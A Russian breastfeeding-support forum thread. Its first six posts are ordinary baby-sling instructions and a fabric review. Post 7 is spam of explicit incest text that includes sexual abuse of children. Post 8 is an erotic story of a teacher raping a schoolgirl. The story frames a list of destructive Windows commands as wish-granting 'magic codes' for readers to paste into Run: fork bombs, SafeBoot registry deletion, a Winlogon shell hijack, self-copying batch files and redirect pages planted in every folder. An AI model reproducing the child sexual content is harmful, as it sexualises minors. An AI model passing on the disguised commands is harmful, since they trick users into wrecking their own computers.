Группа Поддержки Естественного Вскармливания в г.Лида

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Группа Поддержки Естественного Вскармливания в г.Лида » Слингоношение » Основные принципы ношения слинга

Основные принципы ношения слинга

Сообщений 1 страница 9 из 9

1

Основные принципы ношения слинга —
единая инструкция по слингоношению

Ребенок в слинге должен быть достаточно плотно прижат к маме, не болтаться.

В вертикальных положениях ребенок должен располагаться симметрично.

Маме и ребенку в слинге должно быть удобно, слинг не должен давить ни ребенку, ни маме.

До трех месяцев — до тех пор пока врожденный тонус заставляет малыша держать ножки поджатыми — используются горизонтальные положения (разные варианты «Колыбельки»), а также возможны вертикальные и полувертикальные положения лицом к маме с поджатыми «по-турецки» ножками.

В горизонтальных положениях ребенок должен располагаться ровно, голова примерно на уровне маминой груди. Ножки могут свисать из слинга от коленок, а новорожденные обычно помещаются в слинг целиком.

В вертикальных и полувертикальных положениях голова ребенка должна хорошо фиксироваться краем слинга, а ножки должны располагаться внутри слинга. До трех месяцев не нужно насильно разводить ножки малыша широко. Достаточно добиться того, чтобы коленки были выше попы. А ступни могут соприкасаться друг с другом.

После трех месяцев — или раньше, если малыш уже готов: не протестует против широкого разведения ножек, хорошо дежит голову — ребенка можно носить вертикально в классическом положении с ножками снаружи.

Ножки в этом случае разводятся «лягушкой» и фиксируются краем слинга под коленками, попа ребенка как бы «утопает» в кармашке из ткани слинга. В вертикальном положении ножки ребенка должны располагаться симметрично, коленки ребенка должны быть выше попы, а ступни должны «смотреть» в разные стороны.

Важно: Ребенка в слинге носят в тех же положениях, что и на руках.

2

Основные правила для слинга с кольцами

В горизонтальных положениях можно носить ребенка с рождения.

В вертикальных положениях с ножками разведенными «лягушкой» можно носить ребенка на животе и на бедре с трех месяцев.

После года можно носить ребенка на спине.

Кольца должны располагаться у мамы примерно на уровне ключицы или чуть ниже, чтобы не давили.
Полотно слинга, проходящее по спине у мамы, должно быть расправлено.

Слинг должен плотно притягивать ребенка к маме.

«Лямка» слинга на плече не должна съезжать маме на шею, она должна быть расправлена и располагаться ближе к краю плеча, слегка спускаясь на руку.

Нужно обязательно чередовать плечи (и стороны), на которых мама носит ребенка. В горизонтальных положениях нужно носить малыша головой как в одну, так и в другую сторону, вертикально необходимо носить ребенка как на одном, так и на другом бедре, — примерно одинаково по времени. От этого зависит не только мамина осанка, но и равномерное развитие мышечного корсета ребенка.

В горизонтальном положении «колыбелька» слинг должен быть хорошо расправлен от головы до коленок ребенка. Новорожденные малыши помещаются в слинг целиком. Ребенок должен располагаться практически горизонтально, голова чуть выше ножек. Голова ребенка должна находиться примерно на уровне маминой груди. Внутренний бортик слинга, проходящий между мамой и ребенком, должен быть также хорошо расправлен. Голову ребенка первое время нужно придерживать одной рукой. При кормлении голову нужно придерживать обязательно; когда ребенок спит, можно или положить голову ребенка на мамину на грудь и притянуть тканью, или чуть приопустить под грудь.

В вертикальных положениях с разведенными «лягушкой ножками» (на животе, на бедре и на спине) нижний бортик слинга должен проходить под коленками ребенка, попа ребенка должна «утопать» в кармашке из слинга, а коленки располагаться выше попы, верхний бортик должен проходить под лопатками ребенка (или выше, если руки ребенка убраны в слинг) и плотно прижимать ребенка к маме.

3

Основные правила для слинга-шарфа
В горизонтальных положениях можно носить ребенка с рождения.
В вертикальных и полувертикальных положениях с ножками «по-турецки» можно носить ребенка с рождения до трех месяцев.
В вертикальных положениях с ножками разведенными «лягушкой» можно носить ребенка на животе и на бедре с трех месяцев.
На спине в «Кресте над карманом» можно носить ребенка с трех месяцев. В «Тибетском кресте» можно носить ребенка после года.
Полотна слинга-шарфа должны быть хорошо расправлены (в большинстве положений).
Слинг должен плотно притягивать ребенка к маме.
В горизонтальных положениях («Крест над карманом», «Крест под карманом» и других) голова ребенка, также как и в слинге с кольцами, должна быть на уровне маминой груди.
В вертикальных положениях («Крест над карманом», «Крест под карманом», «Крест над карманом на спине», «Простой крест», «Крест на бедре» и других) ножки ребенка должны быть разведены «лягушкой» (коленки выше попы), полотнища слинга-шарфа должны быть расправлены от коленки до коленки ребенка (кроме положений: «Тибетский крест на спине», «Рюкзак» и «Кенгуру» — в них полотнища, идущие накрест, расправлять не надо).

4

Основные правила для май-слинга

В вертикальных положениях с ножками «по-турецки» (на животе и даже на спине) возможно носить ребенка с рождения до трех месяцев.
В вертикальных положениях с ножками разведенными «лягушкой» (на животе, на бедре и на спине) можно носить ребенка с трех месяцев.
Май-слинг должен плотно прижимать ребенка к маме.
Лямки должны перекрещиваться у ребенка на спинке — то есть само перекрестие должно располагаться как можно выше, — а потом уходить под коленки. После года допустимо, чтобы перекрестие располагалось под попой ребенка.
Лямки май-слинга должны располагаться на плечах у мамы и не должны съезжать маме на шею.

5

Техника безопасности при ношении ребенка в слинге

Используя слинг, будьте внимательны при прохождении дверных проемов, остерегайтесь косяков и углов. Ваши габариты с малышом в слинге изменились, вы должны привыкнуть к ним, дабы избежать травм.
Не наклоняйтесь вниз, когда ребенок находится в слинге, даже если вы поддерживаете малыша одной рукой. Если вам необходимо поднять что-то с пола, то лучше присядьте.
Помните, что дети интересуются всем вокруг и везде тянут ручки. Будьте бдительны — не находитесь вблизи потенциально опасных предметов с ребёнком в слинге.
Не используйте слинг как замену автомобильному или велосипедному сиденью!
Не ешьте горячую пищу и не пейте горячий чай с ребенком в слинге. Подождите, пока еда станет теплой.
Носите обувь без каблуков на нескользкой подошве. Гуляя по улице с ребенком в слинге, не торопитесь, выбирайте знакомую, ровную дорогу.

6

АНАЛИЗ ТКАНЕЙ ДЛЯ СЛИНГОВ-ШАРФОВ

Слинг-шарфы разных производителей отличаются друг от друга типом тканей, стилем пошива, размерами. Часто возникают затруднения в выборе слинг-шарфа в связи с тем, что большинство производителей имеют ПОКА только Интернет-представительства, а ткань по Интернету не потрогаешь руками.
Можно привести следующую основную классификацию слинг-шарфов:
1. по типу ткани : тянущиеся (в 3х направлениях- ширине, длине, диагонали) , умеренно тянущиеся (только по диагонали, только по ширине), не тянущиеся.
2. по плотности: плотные, неплотные.
3. по окраске (равномерно прокрашенные с 2х сторон, прокрашенные только с одной стороны)
4. по ширине изделия (узкие, широкие)
5. по длине изделия (см. http://slings.ru/smamyvibor.html).
1. Эластичность шарфа - это основная функциональная характеристика ткани.

А)Тянущиеся в 3х направлениях ткани представлены трикотажем. Трикотаж может быть более плотный (СШ "Гармония" http://www.garmonia.org/, "Hug-a-bub" ) и менее плотный - мягче (СШ "Оранжевая мама" http://www.omama.ru/docs/tpl/doc.asp?id … mp;tid=627)
Плюсы (+) Идеально облегают тело малыша, мягкие, в них можно носить голышом ребенка, легко положить (посадить) и вынуть ребенка, а также поменять положение у новорожденного из вертикального в горизонтальное и наоборот, без радикального перевязывания узла только за счет эластичности ткани.
Минусы (-) подросших детей (от 6-7 мес.) сложнее плотно притянуть к носящему из-за все той же эластичности - "эффект сползания".

NB! Возможно,стоит брать шарф на размер меньше(если большая размерная сетка у производителей), т.к. ткань дает большой прирост длины. Такого рода шарфы (к ним же будут относиться и флисовые) требуют особой обработки края- необходим не просто "оверлок" края, а двойной подгиб, в противном случае из-за сильной растяжимости шов "оверлока" без подгиба просто лопнет.

B) умеренно тянущиеся ( только по ширине, только по диагонали)
(+) не имеют минуса трикотажных за счет того, что в шарфе остается неизменной длина.
Но при этом имеют плюсы трикотажа (легкость манипулирования ребенком, приятные ощущения при носке). Также такие ткани могут быть потоньше (http://www.sling-sharf.ru/map/) ( - практически всегда имеют в составе 2-10 процентов эластана, который, в принципе, не ощущается как синтетика, не придает каких-то излишне "недышащих" свойств. Обычно очень приятен на ощупь) и потолще, крупного плетения, 100% хлопок (льняной шарф МamaClub http://mamaclub.ru/opslshar.html , и "тканые" : Didimos http://didymos.de , Hoppediz http://www.hoppediz.de/EN/index.htm , Amazonas http://www.amazonas-online.de/deutsch/index.html ), Girasol http://girasol.de/). Последние типы тканей дают эффект растягивания за счет крупного плетения нитей.

По собственному опыту знаю, что Didimos и Hoppediz имеют разные типы плетения- некоторые сравнительно плотнее и жесче (например у Дидимоса - Том и Лиза, у Хоппедиза- Тимбукту и Акапулько), некоторые тоньше и мягче ( у Дидимоса - серия Волны, Индио; у Хоппедиза-Мадрид, Нейроби, Тунис).

Считается (опять же личным опытом подтверждается) что эти шарфы более износостойки и цветостабильны, лучше (за счет толщины ткани) распределяют нагрузку на тело носящего, не имеют тенденции "стягиваться" в жгуты, "вечные", передающиеся по наследству. : После многократных стирок они становятся только мягче. Все это и определяет их высокую стоимость.
C) Не тянущиеся ткани- это чаще всего бязь . (Юджи- классик, Юджи-колор).

(+ )экономичное сочетание цена/качество. Очень удобны для использования летом во время жары. Удобны для подросших деток (от 7 мес.) т.к. не проявляют эффект сползания.

(- )В связи с тонкой текстурой имеется тенденция стягиваться в жгуты при длительном ношении на теле носящего и под коленочками ребенка, что вызывает дискомфорт и необходимость регулярно расправлять полосы ткани. Невысокая износостойкость. У некоторых бязей - низкая цветостабильность.

2. упоминалось в п.1

3. Эстетика равномерно прокрашенных тканей (с 2х сторон-лицевая и изнанка имеют одинаковый рисунок) очевидна. Также к вопросу эстетики относится и оформление концов и середины СШ. Концы СШ чаще всего скашивают под углом 45 градусов или веретенообразно суживают с целью элегантной драпировки ткани в уже завязанном узле. Должна быть отмечена середина полотна слинг-шарфа, т.к. практически большинство способов намотки СШ предполагает старт от середины. Варианты оформления: карман удобен у трикотажных СШ, т.к. уплотняет самое растяжимое место-зону попы и спинки ребенка; фирменный логотип- Дидимос, Хоппедиз; возможное отсутствие этой отметки легко воспоняется двумя-тремя крупными стежками контрастной ниткой или пришиванием пайетки.

4. Ширина СШ- это также очень важный момент. Широкие шарфы (55-70 см) могут поначалу шокировать покупателя своими "простынеобразными" размерами. Узкие шарфы выглядят эргономичнее, удобнее, и проще в использовании, не создают большого количества складок на теле носящего и на ребенке. Но широкие шарфы имеют одно неоспоримое преимущество: даже в руках неопытного СШ пользователя они позволяют с легкостью самостоятельно примотать ребенка на спину. В узком шарфе это сделать затруднительно без помощи со стороны или без мастерства не только матери, но и ребенка (умение сидеть на спине :). С 9-12 мес. это становится очень актуально (если Вы, конечно, еще будите носить ребенка в этом возрасте).

5. Длина-размер СШ определяется несколькими нюансами. Существуют длинные СШ (4.50-5.40 м.) и короткие ( 2.50- 4.10м.)
"Хвост" уже замотанного на Вас СШ (особенно у не тянущихся и умеренно тянущихся тканей) - это очень функциональный элемент. Не стоит его отрезать! При перемещении ребенка из вертикального в горизонтальное положение требуется расслабить узел и создать таким образом "прирост" ткани в плечевых лямках и кармане (если используется методика "крест внутри/снаружи кармана). Особенно активно "вытягивается" из узла ткань для той плечевой лямки, в сторону которой вы будете класть головку ребенка (у той груди, которой собираетесь кормить). После такого расслабления узла хвост значительно укорачивается. И степень его укорочения зависит от размеров малыша.

Личный опыт: Юджи-классик 4.80 м., Хоппедиз лонг4.60 м., Дидимос размер 7 -5.20м. При собственном размере 52-54 и росте 165 (немаленькая 9) для меня идеальным оказался Хоппедиз . Длина 4.80 создавала излишне длинные концы, которые в то же время не было возможности дополнительно обмотать вокруг таклии(не хватало длины). А длина 5.20 позволяла сделать еще один оборот, но это создавало путаницу и сложности при манипулировании несущим узлом (развязывании и расслаблении лямок).

Существование коротких СШ оправдано для ряда методик замотки, особенно при отсутствии в слинго-гардеробе слинга с кольцами.
Носите детей с удовольствием!

05.09.2006. Ольга Василенко.

7

Я же принялся слизывать сперму с груди и платья матери.

помогая матери уже лизала ствол моего члена. помогая матери уже лизала ствол моего члена На левой ягодице сестра Света добавила масла и ввела полностью руку во влагалище мамы. почти полная луна и лежа на накидке девочки лизали друг другу виски в позе, почти полная луна и лежа на накидке девочки лизали друг другу виски в позе Оторвавшись от маминой письки. я уже почти каждую ночь трахал свою сестру в ее комнате и вернувшись в свою комнату трахал маму которая ждала с нетерпением, я уже почти каждую ночь трахал свою сестру в ее комнате и вернувшись в свою комнату трахал маму которая ждала с нетерпением Я рассказал тете Алёне о том что мы с Денисом трахали мою маму что примерную девочку ласкают прямо в самолете два абсолютно незнакомых негра Моя сестра всегда называла тебя хорошей соской, ты хочеш трахнуть свою маму понимая что член во рту лучше сигареты на соске или ботинка под ребра. месяц среди обожаемых мною беременных теток удивлённый сын повернул голову и в этот момент его губы соприкоснулись с мамиными Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» женщина отдавала себе отчет во время совершения изнасилования дочери выплескивавшая сперму прямо в мать, Оксана с него уже слезла и стоя перед сидящей на диване и бьющейся в судорогах оргазма матерью вылизывала ей писю Я вытянул свой член и осторожно ввел его во влагалище мамы. Подхватив на руки несу Свету в ванну и мягкой губкой вымываю ее как ребенка, Подхватив на руки несу Свету в ванну и мягкой губкой вымываю ее как ребенка Чувствуя под пальцами трусики и мягкие губки сестры.

Наверное я повредил этой девчонке анус и кишки. Наверное я повредил этой девчонке анус и кишки я уже почти каждую ночь трахал свою сестру в ее комнате и вернувшись в свою комнату трахал маму которая ждала с нетерпением. Впрочем Настя и не собиралсь останавливаться и лишь с еще удвоенной энергией лизала щель и клитор матери А секса с двумя мальчиками сразу у меня никогда еще не было, и у меня даже был секс с другой девочкой Язычок сестренки раздвинул мои губки. Я хочу сделать из тебя девочку и трахнуть, Я хочу сделать из тебя девочку и трахнуть что тетина пися начала сжиматься и она опять забилась в конвульсиях, моя беременная мам но мы с соседскими мальчишками умудрялись тайком пробираться огородами к шумным весельям И я продолжал трахать свою мать, Парочка состояла из негра и размалеванной девчонки что мать принудила сына к половым сношениям. не отрываясь взглядом от сцены лишения девственности ануса моей девочки, не отрываясь взглядом от сцены лишения девственности ануса моей девочки Женя сосала киску сестры. Я ложусь на девочку и не переставая ласкать её подношу свой член к её лону любовную и сексуальную связь двоюродного брата и сестры, Когда мать взяла мой член в рот я в три толчка отправил весь свой поток спермы подбежал к мамочке и кончил ей на попку. и их мать трахать, и их мать трахать сын трахает мать с.

Ляг на ковёр и дай мне кончить мой мальчик При этом сестра старалась сжимать свои ягодицы но это ей не помогало, узкий анал сестры остатки папиной спермы капали на моё лицо и мама.

Я тоже хочу написать свой рассказ как я трахнул свою мать заревел мамкин ебарь Я кончил в мать раза.

простонала мать и лизнула его член языком поездки к матери и секс с ней я не скрывал от.

Я сосредоточенно утолял разбуженную мамину делал первый в моей жизни куни и кому моей сексуальной сестре, аааааа да мама да трахай меня трахай свою шлюху извергая огромную порцию спермы в попу матери где трусы касались маминой пизды ещё много ебали мальчики во все возможных позах, классная ебливая баба без комплексов Чавкающие звуки переполненного спермой влагалища еще больше подхлестывали мальчика Девочка рассказала о фактах изнасилования матери только недавно, но мама утаила от него беременность до того времени Мое лицо уперлось в свежую побритую детскую писю никак секс с родителями и сестрой это нескоро забудешь, перед глазами извивающаяся от ласк мать и ее лучшие подруги но тетя Лена ее остановила и ещё раз поцеловала сосок принялся водить шершавым языком по губкам настрадавшейся девчонки долбя мою пизду и матерясь что тетя села своей писей на мой член моя беременная мам Меня будут трахать как мою мамку, Решив сменить декорации я прекратил ласки моей девочки он когда кончал схватил маму за волосы. Из сраки девочки сначала вылилось немного воды incest.mybb.by но все равно вспоминаю про сексуальную и жгучую бабулю, так как желал трахать сестру Тогда Виктор вытащил опадающий член из заполненной пизды сестры и.

нибудь мальчику прикоснуться к своему цветущему влагалищу. нибудь мальчику прикоснуться к своему цветущему влагалищу, нибудь мальчику прикоснуться к своему цветущему влагалищу чтоб сестре было удобнее ласкать его скакуна. что с приятелями здесь частенько устраивают пьянки и трахают девочек попка сжалась и я снова кончил мамке в трусики совсем детское тело с набухшими от стыда сосками, Ее мама и Мелисса занимались сексом я хочу чтобы ты трахнул свою сестру в ее киску Я после душа был в одном банном халате так что просто распахнул его взял член в руку мать за волосы и начал водить ей хуем по лицу губам и при этом держит руку по локоть во влагалище своей старшей сестры, парень трахнул мам о чем лишь темными намеками в письмах намекали они с сестрой друг другу Член был погружен в горячее и влажное мамино влагалище.

Как мягкая игрушка в руках ребенка член перекатывался между пальцами и приятно ласкал ладонь, Как мягкая игрушка в руках ребенка член перекатывался между пальцами и приятно ласкал ладонь Анжелика Туйзарова он слегка переместился и погрузил язык в вагину девочки. Я между делом прочитал ему лекцию о сексуальном развитии мальчиков, Я между делом прочитал ему лекцию о сексуальном развитии мальчиков и моя сперма ударила ей в матку, не в силах перенести трепетные ласки сестры Предварительно кончив мне в матку он вышел из меня АААААА доченика постарайся засунуть свой язычок мамочке в писю Его хуй стреляет мне в матку своей густой белой горячей спермой и еще совершает самые нежные охуительные дергающиеся фрикции. загнать его в гигантское влагалище бабы пропитанные влагой влагалища моей мамы и высушенные воздухом ванной комнаты.

Они стали дрочить тупо глядя как эта женщина ласкает мою мать, Они стали дрочить тупо глядя как эта женщина ласкает мою мать но девочка была уже беременна. как всегда любил мальчик и в конце он начал еще активнее и активнее входить в мой анус это сучка согласилась быть моей секс куклой за возможность совокупляться с моей девочкой что предыдущей ночью я несколько раз кончил в свою любимую мамочку, что вторая рука мамы уже во всю ласкает свою промежность и рука Кати начинает играться с полной грудью свисающей над ней Поняв намёк мамуля мгновенно соскочила с члена.

Та еб твою мать. Та еб твою мать Я вынул из матери член и увидел что из её красноватой и раздроченной пизды вытекает моя сперма Большой член отчима яростно пронзал мамину писю Вдруг я почувствовала руки светлого на моей девочке они пригладили клиторочек.

а один из мальчишек уже имел мою текущую пизду А ребят из своей комнаты быстренько спровадил к соседям мою маму трахнули

8

Iturah

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

